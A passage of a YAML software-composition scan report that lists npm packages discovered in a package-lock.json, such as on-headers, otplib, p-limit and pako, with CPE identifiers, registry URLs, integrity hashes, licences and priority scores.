- cpe: cpe:2.3:a:on:on_finished:2.4.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/on-finished@2.4.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz
integrity: sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==
dependencies:
ee-first: 1.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 01ce9d2b89e4c438
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: on-headers 1.1.0'
title: on-headers 1.1.0
description: 'Package discovered: on-headers 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c535b114447926f1
name: on-headers
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:on-headers:on-headers:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on-headers:on_headers:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on_headers:on-headers:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on_headers:on_headers:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on:on-headers:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:on:on_headers:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/on-headers@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/on-headers/-/on-headers-1.1.0.tgz
integrity: sha512-737ZY3yNnXy37FHkQxPzt4UZ2UWPWiCZWLvFZ4fu5cueciegX0zGPnrlY6bwRg4FdQOe9YU8MkmJwGhoMybl8A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bd9248df9b4e52cf
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: once 1.4.0'
title: once 1.4.0
description: 'Package discovered: once 1.4.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3f85171a571bc28a
name: once
version: 1.4.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:once:once:1.4.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/once@1.4.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/once/-/once-1.4.0.tgz
integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==
dependencies:
wrappy: '1'
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 92e0060edd98f736
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: otplib 12.0.1'
title: otplib 12.0.1
description: 'Package discovered: otplib 12.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7b45ff9710a4aaac
name: otplib
version: 12.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:otplib:otplib:12.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/otplib@12.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/otplib/-/otplib-12.0.1.tgz
integrity: sha512-xDGvUOQjop7RDgxTQ+o4pOol0/3xSZzawTiPKRrHnQWAy0WjhNs/5HdIDJCrqC4MBynmjXgULc6YfioaxZeFgg==
dependencies:
'@otplib/core': ^12.0.1
'@otplib/preset-default': ^12.0.1
'@otplib/preset-v11': ^12.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1061878b64866643
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: p-limit 2.3.0'
title: p-limit 2.3.0
description: 'Package discovered: p-limit 2.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c6cc7a145d3e597c
name: p-limit
version: 2.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/p-limit@2.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz
integrity: sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==
dependencies:
p-try: ^2.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6cbc6aaefd17b7fc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: p-limit 3.1.0'
title: p-limit 3.1.0
description: 'Package discovered: p-limit 3.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: bdf7b3073a60eac3
name: p-limit
version: 3.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/p-limit@3.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz
integrity: sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==
dependencies:
yocto-queue: ^0.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 16add8edeff36c6a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: p-locate 4.1.0'
title: p-locate 4.1.0
description: 'Package discovered: p-locate 4.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ee16619fa3035ca6
name: p-locate
version: 4.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/p-locate@4.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz
integrity: sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==
dependencies:
p-limit: ^2.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 94f4f30dde8856c2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: p-try 2.2.0'
title: p-try 2.2.0
description: 'Package discovered: p-try 2.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ee061a11e32e10c1
name: p-try
version: 2.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/p-try@2.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz
integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8f14c9999630c748
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: package-json-from-dist 1.0.1'
title: package-json-from-dist 1.0.1
description: 'Package discovered: package-json-from-dist 1.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d82606f27243dac6
name: package-json-from-dist
version: 1.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BlueOak-1.0.0
spdxExpression: BlueOak-1.0.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/package-json-from-dist@1.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz
integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 09093ffb9ed76376
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: pako 0.2.9'
title: pako 0.2.9
description: 'Package discovered: pako 0.2.9'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7762d448aa187997
name: pako
version: 0.2.9
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: (MIT AND Zlib)
spdxExpression: (MIT AND Zlib)
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/pako@0.2.9
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/pako/-/pako-0.2.9.tgz
integrity: sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d21476c4aa5bcc9d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: pako 1.0.11'
title: pako 1.0.11
description: 'Package discovered: pako 1.0.11'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 8811cee431746c6d
name: pako
version: 1.0.11
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: (MIT AND Zlib)
spdxExpression: (MIT AND Zlib)
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/pako@1.0.11
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/pako/-/pako-1.0.11.tgz
integrity: sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b50b24498bc5a2c6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: parse-svg-path 0.1.2'
title: parse-svg-path 0.1.2
description: 'Package discovered: parse-svg-path 0.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7c5d21eaeee09ad2
name: parse-svg-path
version: 0.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/parse-svg-path@0.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz
integrity: sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 09bae738f1e39a33
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: parseley 0.12.1'
title: parseley 0.12.1
description: 'Package discovered: parseley 0.12.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 22f6c66ddf9c06f1
name: parseley
version: 0.12.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:parseley:parseley:0.12.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/parseley@0.12.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/parseley/-/parseley-0.12.1.tgz
integrity: sha512-e6qHKe3a9HWr0oMRVDTRhKce+bRO8VGQR3NyVwcjwrbhMmFCX9KszEV35+rn4AdilFAq9VPxP/Fe1wC9Qjd2lw==
dependencies:
leac: ^0.6.0
peberminta: ^0.9.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 37de8d05673d8403
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: parseurl 1.3.3'
title: parseurl 1.3.3
description: 'Package discovered: parseurl 1.3.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 484c0b9a6084b4bb
name: parseurl
version: 1.3.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:parseurl:parseurl:1.3.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/parseurl@1.3.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz
integrity: sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4b3d2fa0f1f98ea0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: path-exists 4.0.0'
title: path-exists 4.0.0
description: 'Package discovered: path-exists 4.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7c130f49f1f39739
name: path-exists
version: 4.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:path-exists:path-exists:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-exists:path_exists:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_exists:path-exists:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_exists:path_exists:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path-exists:4.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path_exists:4.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/path-exists@4.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz
integrity: sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5bb936b7686247f0
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: path-expression-matcher 1.5.0'
title: path-expression-matcher 1.5.0
description: 'Package discovered: path-expression-matcher 1.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 802e4db060f878e6
name: path-expression-matcher
version: 1.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:path-expression-matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-expression-matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_expression_matcher:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_expression_matcher:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path-expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_expression:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path_expression:path_expression_matcher:1.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:path:path-expression-matcher:1.5.0:*:*:*:*:*:*:*
